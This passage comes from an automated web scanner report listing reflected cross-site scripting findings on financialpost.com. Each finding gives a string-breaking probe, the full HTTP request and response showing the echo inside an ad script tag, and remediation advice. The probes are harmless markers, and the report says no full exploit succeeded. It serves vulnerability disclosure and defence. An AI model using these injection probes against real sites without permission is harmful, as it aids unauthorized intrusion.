Path:   /_assets/css/idc/idms_styles.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3be0'%3b80f99c8f660 was submitted in the REST URL parameter 4. This input was echoed as e3be0';80f99c8f660 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets/css/idc/e3be0'%3b80f99c8f660 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:40 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43284


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets/css/idc/e3be0';80f99c8f660/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets;kw=css;kw=idc;kw=e3be0';80f99c8f660;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=22371374?">
...[SNIP]...

1.25. http://www.financialpost.com/_assets/css/idc/watchlist.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/css/idc/watchlist.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 124dc'%3b0b5b2a36149 was submitted in the REST URL parameter 1. This input was echoed as 124dc';0b5b2a36149 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets124dc'%3b0b5b2a36149/css/idc/watchlist.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:23 GMT
Date: Sun, 19 Dec 2010 03:03:23 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43333


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets124dc';0b5b2a36149/css/idc/watchlist;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets124dc';0b5b2a36149;kw=css;kw=idc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=30497961?">
...[SNIP]...

1.26. http://www.financialpost.com/_assets/css/idc/watchlist.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/css/idc/watchlist.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9facd'%3bc69670aae3e was submitted in the REST URL parameter 2. This input was echoed as 9facd';c69670aae3e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets/css9facd'%3bc69670aae3e/idc/watchlist.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:28 GMT
Date: Sun, 19 Dec 2010 03:03:28 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43298


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets/css9facd';c69670aae3e/idc/watchlist;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets;kw=css9facd';c69670aae3e;kw=idc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=87037935?">
...[SNIP]...

1.27. http://www.financialpost.com/_assets/css/idc/watchlist.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/css/idc/watchlist.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9f6a'%3b858dfffb16a was submitted in the REST URL parameter 3. This input was echoed as a9f6a';858dfffb16a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets/css/idca9f6a'%3b858dfffb16a/watchlist.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:33 GMT
Date: Sun, 19 Dec 2010 03:03:33 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43261


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets/css/idca9f6a';858dfffb16a/watchlist;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets;kw=css;kw=idca9f6a';858dfffb16a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=56715887?">
...[SNIP]...

1.28. http://www.financialpost.com/_assets/css/idc/watchlist.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/css/idc/watchlist.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88f81'%3b65df32cf4f8 was submitted in the REST URL parameter 4. This input was echoed as 88f81';65df32cf4f8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets/css/idc/88f81'%3b65df32cf4f8 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:39 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43284


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets/css/idc/88f81';65df32cf4f8/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets;kw=css;kw=idc;kw=88f81';65df32cf4f8;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=56091540?">
...[SNIP]...

1.29. http://www.financialpost.com/_assets/include/thirdparty/idc/ad-init.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/include/thirdparty/idc/ad-init.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40b85'%3bc4767f71b50 was submitted in the REST URL parameter 1. This input was echoed as 40b85';c4767f71b50 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets40b85'%3bc4767f71b50/include/thirdparty/idc/ad-init.js HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:27 GMT
Date: Sun, 19 Dec 2010 03:03:27 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43677


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets40b85';c4767f71b50/include/thirdparty/idc/ad-init;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets40b85';c4767f71b50;kw=include;kw=thirdparty;kw=idc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surrou
...[SNIP]...

1.30. http://www.financialpost.com/_assets/include/thirdparty/idc/ad-init.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/include/thirdparty/idc/ad-init.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b9d1'%3b3317ae53630 was submitted in the REST URL parameter 2. This input was echoed as 8b9d1';3317ae53630 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets/include8b9d1'%3b3317ae53630/thirdparty/idc/ad-init.js HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:32 GMT
Date: Sun, 19 Dec 2010 03:03:32 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43640


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets/include8b9d1';3317ae53630/thirdparty/idc/ad-init;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets;kw=include8b9d1';3317ae53630;kw=thirdparty;kw=idc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'o
...[SNIP]...

1.31. http://www.financialpost.com/_assets/include/thirdparty/idc/ad-init.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/include/thirdparty/idc/ad-init.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1cea'%3b38c5aa0a5e8 was submitted in the REST URL parameter 3. This input was echoed as f1cea';38c5aa0a5e8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets/include/thirdpartyf1cea'%3b38c5aa0a5e8/idc/ad-init.js HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:37 GMT
Date: Sun, 19 Dec 2010 03:03:37 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43604


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets/include/thirdpartyf1cea';38c5aa0a5e8/idc/ad-init;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets;kw=include;kw=thirdpartyf1cea';38c5aa0a5e8;kw=idc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=32534089
...[SNIP]...

1.32. http://www.financialpost.com/_assets/include/thirdparty/idc/ad-init.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/include/thirdparty/idc/ad-init.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6456b'%3b4a9a61322fb was submitted in the REST URL parameter 4. This input was echoed as 6456b';4a9a61322fb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets/include/thirdparty/idc6456b'%3b4a9a61322fb/ad-init.js HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:42 GMT
Date: Sun, 19 Dec 2010 03:03:42 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43587


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets/include/thirdparty/idc6456b';4a9a61322fb/ad-init;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets;kw=include;kw=thirdparty;kw=idc6456b';4a9a61322fb;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68207987?">
...[SNIP]...

1.33. http://www.financialpost.com/_assets/include/thirdparty/idc/ad-init.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/include/thirdparty/idc/ad-init.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9094'%3b9fe591fa809 was submitted in the REST URL parameter 5. This input was echoed as e9094';9fe591fa809 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets/include/thirdparty/idc/e9094'%3b9fe591fa809 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:47 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43595


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets/include/thirdparty/idc/e9094';9fe591fa809/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets;kw=include;kw=thirdparty;kw=idc;kw=e9094';9fe591fa809;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=35880543?"
...[SNIP]...

1.34. http://www.financialpost.com/ajax/email/generic.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /ajax/email/generic.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c67f5'%3b33a72d2d10d was submitted in the REST URL parameter 1. This input was echoed as c67f5';33a72d2d10d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ajaxc67f5'%3b33a72d2d10d/email/generic.xml HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 02:58:13 GMT
Date: Sun, 19 Dec 2010 02:58:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43245


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/ajaxc67f5';33a72d2d10d/email/generic;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=ajaxc67f5';33a72d2d10d;kw=email;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=56945468?">
...[SNIP]...

1.35. http://www.financialpost.com/ajax/email/generic.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /ajax/email/generic.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9df8'%3b9082a8b2204 was submitted in the REST URL parameter 2. This input was echoed as e9df8';9082a8b2204 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ajax/emaile9df8'%3b9082a8b2204/generic.xml HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 02:58:19 GMT
Date: Sun, 19 Dec 2010 02:58:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43209


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/ajax/emaile9df8';9082a8b2204/generic;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=ajax;kw=emaile9df8';9082a8b2204;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=69619233?">
...[SNIP]...

1.36. http://www.financialpost.com/ajax/email/generic.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /ajax/email/generic.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e698'%3b8b8919e8594 was submitted in the REST URL parameter 3. This input was echoed as 6e698';8b8919e8594 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ajax/email/6e698'%3b8b8919e8594 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
